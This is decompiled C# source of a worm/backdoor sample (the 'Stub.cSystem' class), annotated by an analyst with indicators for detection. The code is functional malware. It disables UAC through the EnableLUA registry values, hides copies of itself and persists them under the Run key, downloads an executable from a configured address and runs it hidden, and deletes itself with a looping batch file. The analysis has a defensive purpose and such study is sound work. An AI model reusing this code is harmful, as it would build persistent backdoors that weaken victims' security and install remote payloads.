
// Decompiled with JetBrains decompiler
// Type: Stub.cSystem
// Assembly: N0ise, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 21609AF2-EC6A-4FAA-88B3-5930EE31DBBA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.MSIL.Arcdoor.bnb-2ba0542fbb07307543e432f53a360961fd7e6507d83c004424a2e44ed30b4dbc.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Threading;
namespace Stub
{
// Analyst notes on a decompiled malware sample; the code is kept byte-identical to the decompiler output.
// This class handles host setup for the bot: a single-instance mutex, optional weakening of
// UAC and notification settings, copy-and-persist installation, update via download-and-run,
// removal, and self-deletion through a batch file.
// All configuration (mutex name, drop paths, Run value names, bDisableUAC) is read from
// cMain.ConfigClass, which is not part of this file, so the concrete indicator values are not visible here.
// Host artefacts visible in this class that are worth monitoring:
//   - value writes/deletes under ...\CurrentVersion\Run (HKCU, and HKLM on removal)
//   - EnableLUA set to 0 under ...\CurrentVersion\Policies\System (HKCU and HKLM)
//   - EnableBalloonTips set to 0 under HKCU ...\Explorer\Advanced
//   - %TEMP%\delete.bat and a randomly named .exe created in and started from %TEMP%
//   - files written with the Hidden attribute and then started with a hidden window
internal class cSystem
{
// Handle to the named mutex created in createMutex(); closed before child processes are started.
private Mutex zMutex;
/// <summary>
/// Entry point for this class: runs the mutex check, the optional settings changes,
/// and the installation routine, in that order.
/// </summary>
public void loadSystem()
{
this.createMutex();
this.DisableProcedures();
this.InstallBot();
}
/// <summary>
/// Creates the named mutex from cMain.ConfigClass.sMutex and exits the process on any exception.
/// </summary>
private void createMutex()
{
try
{
// The mutex is requested with initial ownership and released immediately.
// Per .NET semantics, ReleaseMutex() throws when the calling thread does not own the mutex,
// which is the case when another process already created it - so this presumably acts as
// the single-instance check. The mutex name is therefore a host-based indicator.
this.zMutex = new Mutex(true, cMain.ConfigClass.sMutex);
this.zMutex.ReleaseMutex();
}
catch
{
Environment.Exit(-1);
}
}
/// <summary>
/// Copies the running executable to every configured path, marks the copies hidden,
/// registers the first path under the HKCU Run key, starts the copies, and exits.
/// Does nothing when checkInstall() reports an existing installation.
/// </summary>
private void InstallBot()
{
string fileName = Process.GetCurrentProcess().MainModule.FileName;
if (this.checkInstall())
return;
try
{
foreach (string str in cMain.ConfigClass.sFilePath)
{
// checkFile is defined elsewhere; presumably a file-existence test - confirm against cMain.FunctionClass.
// Only the Copy is conditional; SetAttributes runs for every path.
if (!cMain.FunctionClass.checkFile(str))
System.IO.File.Copy(fileName, str);
System.IO.File.SetAttributes(str, FileAttributes.Hidden);
}
}
catch
{
// Errors are swallowed; an exception on one path ends the loop for the remaining paths.
}
try
{
// Persistence: a Run value named sRegName[0] pointing at the quoted first drop path.
// Values under this key are launched at user logon.
Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue(cMain.ConfigClass.sRegName[0], (object) ('"'.ToString() + cMain.ConfigClass.sFilePath[0] + (object) '"'));
}
catch
{
}
try
{
// The mutex handle is closed before the copies start, presumably so their own mutex check passes.
this.zMutex.Close();
foreach (string str in cMain.ConfigClass.sFilePath)
new Process()
{
StartInfo = {
FileName = str,
WindowStyle = ProcessWindowStyle.Hidden
}
}.Start();
}
catch
{
}
// The original process always terminates here, leaving only the started copies running.
Environment.Exit(-1);
}
/// <summary>
/// Downloads a file from <paramref name="sFileAddress"/> into %TEMP% under a generated
/// name ending in ".exe", starts it with a hidden window, then self-deletes and exits.
/// </summary>
/// <param name="sFileAddress">Address passed unchanged to WebClient.DownloadFile; its origin is not visible in this file.</param>
public void updateBot(string sFileAddress)
{
try
{
this.zMutex.Close();
}
catch
{
}
try
{
// Random.Next(5, 12) yields 5..11; genString is defined elsewhere, so the argument is
// presumably the length of the generated name - confirm against cMain.FunctionClass.
string str = cMain.FunctionClass.genString(new Random().Next(5, 12)) + ".exe";
// The downloaded file is executed as-is; no validation of the content is visible here.
// Detection angle: a process writing a new .exe into %TEMP% and starting it right away.
new WebClient().DownloadFile(sFileAddress, Environment.GetEnvironmentVariable("TEMP") + "\\" + str);
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable("TEMP") + "\\" + str),
WindowStyle = ProcessWindowStyle.Hidden
}
}.Start();
}
catch
{
}
// Runs whether or not the download and start succeeded.
this.SelfDestruct();
Environment.Exit(-1);
}
/// <summary>
/// Deletes the Run values and the configured drop files, then self-deletes and exits.
/// </summary>
public void RemoveBot()
{
try
{
// Both deletes share one try block, so an exception on the HKCU delete skips the HKLM delete.
// The HKLM value (sRegName[1]) is not written anywhere in this class; if it is set, that happens elsewhere.
Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true).DeleteValue(cMain.ConfigClass.sRegName[0]);
Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true).DeleteValue(cMain.ConfigClass.sRegName[1]);
}
catch
{
}
try
{
foreach (string path in cMain.ConfigClass.sFilePath)
System.IO.File.Delete(path);
}
catch
{
}
this.SelfDestruct();
Environment.Exit(-1);
}
/// <summary>
/// Reports whether the installation is considered present.
/// </summary>
/// <returns>
/// False when checkFile() fails for the first configured path; true otherwise,
/// including when the path list is empty.
/// </returns>
private bool checkInstall()
{
string[] sFilePath = cMain.ConfigClass.sFilePath;
int index = 0;
// As decompiled this is an 'if', not a loop: only the entry at index 0 is examined.
if (index < sFilePath.Length)
{
string FilePath = sFilePath[index];
if (!cMain.FunctionClass.checkFile(FilePath))
return false;
}
return true;
}
/// <summary>
/// Writes %TEMP%\delete.bat containing a delete-and-retry loop for the running executable
/// and starts it without a window. All errors are swallowed.
/// </summary>
private void SelfDestruct()
{
try
{
// Batch content: label RP, 'del' of the quoted first command-line argument, then
// 'if exist' on the quoted bare file name of the main module, looping back to RP.
// The 'del' target comes from argv[0] while the 'if exist' test uses only the file name.
string str = ":RP\ndel " + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + "\nif exist " + (object) '"' + Path.GetFileName(Process.GetCurrentProcess().MainModule.FileName) + (object) '"' + " goto RP";
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable("TEMP") + "\\delete.bat");
textWriter.WriteLine(str);
textWriter.Close();
// Detection angle: a fixed file name (delete.bat) in %TEMP% started with CreateNoWindow.
// The batch file itself is not removed by this code and may remain as a forensic artefact.
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable("TEMP") + "\\delete.bat"),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
/// <summary>
/// When cMain.ConfigClass.bDisableUAC is set, writes registry values that turn off
/// balloon tips and set EnableLUA to 0. Returns immediately when the flag is not set.
/// </summary>
private void DisableProcedures()
{
if (!cMain.ConfigClass.bDisableUAC)
return;
try
{
// EnableBalloonTips = 0 for the current user; presumably meant to suppress notification balloons.
Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", true).SetValue("EnableBalloonTips", (object) "0", RegistryValueKind.DWord);
}
catch
{
}
try
{
// EnableLUA = 0 under Policies\System is the setting that controls UAC; the HKLM value is the machine-wide one.
// Both writes share one try block, so an exception on the HKCU write (for example, OpenSubKey
// returning null for a missing key) skips the HKLM write; the HKLM artefact may therefore be absent.
// A change of EnableLUA to 0 is a high-signal event for registry monitoring.
Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", true).SetValue("EnableLUA", (object) "0", RegistryValueKind.DWord);
Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", true).SetValue("EnableLUA", (object) "0", RegistryValueKind.DWord);
}
catch
{
}
}
}
}